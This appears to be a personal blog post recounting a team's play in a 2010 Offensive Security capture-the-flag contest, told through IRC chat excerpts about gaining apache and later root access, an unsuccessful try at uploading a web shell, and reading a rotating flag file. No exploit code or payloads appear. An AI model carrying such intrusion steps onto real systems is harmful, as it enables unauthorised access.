[16:52] <@Sud0> uid=48(apache) gid=494(apache) groups=494(apache)

[16:52] <@Sud0> /usr/local/APPCure-full/lib/admin

[16:52] <@Sud0> uid=48(apache) gid=494(apache) groups=494(apache)

[16:52] <@Sud0> /usr/local/APPCure-full/lib/admin

[16:52] <@mr_me> NICE

[16:52] <@mr_me> dude

[16:52] <@mr_me> UPLOAD A WEB SHELL

[16:53] <@Sud0> yes will do it ;)


After trying to upload a web shell without success we decided to try an other approach (going directly to the n00bsecret.txt)

[17:32] <@Sud0> mr_me wake up :)

[17:32] <@mr_me> 1 sec

[17:32] <@Sud0> héhé

[17:32] <@corelanc0d3r> can anyone run a find command on the server, to find out where the n00bSecret.txt file is located ?

[17:32] <@mr_me> not fast as u

[17:33] <@corelanc0d3r> they reverted

[17:33] <@Sud0> fine :)

[17:33] <@Sud0> will find it

[17:33] <@Sud0> one sec

[17:34] <@Sud0> /opt/0c2b7b8071ee658e1c957d3b024ff872d2/n00bSecret.txt

[17:34] <@mr_me> how did u get that

[17:34] <@corelanc0d3r> with find command ?

[17:34] <@corelanc0d3r> so can you cat the file ?

[17:34] <@Sud0> cat ->

[17:34] <@Sud0> 4e4a430da8f32cfa4e41a3e7999bee6b11e8f925154d4adedd0749790d0644aaebff21dc18451ad0e2d3d06b639315b41478c23663f743bf8e66fa2661a3f21c

[17:34] <@mr_me> yeh now cat

[17:34] <@Sud0> :D

[17:34] <@mr_me> NICE

[17:34] <@corelanc0d3r> that's the cat ?

[17:34] <@TecR0c> yayyyyyyyyyyy


As the keys life was about 10 mn, First one to gain stage 2 was Mr TecR0c

[17:38] <@TecR0c> 25 points !

[17:39] <@TecR0c> stage 2 !

[17:39] <@corelanc0d3r> guys

[17:39] <@corelanc0d3r> can you please post your findings on dradis

[17:39] <@Sud0> wait

[17:39] <@Sud0> wait

[17:39] <@Sud0> the file n00b

[17:39] <@Sud0> is no longer there

[17:40] <@corelanc0d3r> file changes every few minutes ?

[17:40] <@mr_me> it must

[17:40] <@TecR0c> shit

[17:40] <@mr_me> doesnt work for me

[17:40] <@mr_me> Sud0:

[17:40] <@mr_me> can u cat it for everyone

[17:40] <@mr_me> plz

[17:40] <@mr_me> we have slow requests here

[17:41] <@TecR0c> shti didn't know it can only be used once

[17:41] <@TecR0c> sorry sud0

[17:41] <@Sud0> :'(

Next Chapter : guetting the killthen00b machine

Offsec CTF : How Strong Is Your Fu (HSIYF)

Here we are, my first article on my first blog.
The article is not really about how we got 75 in offsec CTF but how it was, and to share the moment that we spent together

Generally it started like this (08/05/2010):

[15:51] <@markot> :D
[15:52] <@chap0> ?howstrongisyourfu?
[15:52] <@chap0> as password????
[15:52] <@chap0> no one got an email???
[15:52] <@markot> i tried "password"
[15:52] <@markot> :D
[15:53] <@chap0> no really ?howstrongisyourfu? is the password that was sent to me
[15:53] <@TecR0c> ok
[15:53] <@TecR0c> back
[15:55] <@markot> works!!


It Ended like That (10/05/2010):

[11:21] <@Sud0> uid=0(root) gid=0(root) groups=33(www-data)
[11:21] <@Sud0> uid=0(root) gid=0(root) groups=33(www-data)
[11:21] <@Sud0> uid=0(root) gid=0(root) groups=33(www-data)
[11:22] <@Sud0> uid=0(root) gid=0(root) groups=33(www-data)
[11:22] <@_sinn3r> whoat
[11:22] <@TecR0c> omg
[11:22] <@Sud0> uid=0(root) gid=0(root) groups=33(www-data)
[11:22] <@_sinn3r> which file?
[11:22] <@Sud0> uid=0(root) gid=0(root) groups=33(www-data)
[11:22] <@TecR0c> give me KEY:)
[11:22] <@mr_me> wow
[11:22] <@TecR0c> go Sud0 !!!!!!!!!!!!!!
[11:22] <@mr_me> wtf go go

Ok lets share the best moments between thoes two parts and as you will see all did a great job, everyone got his part.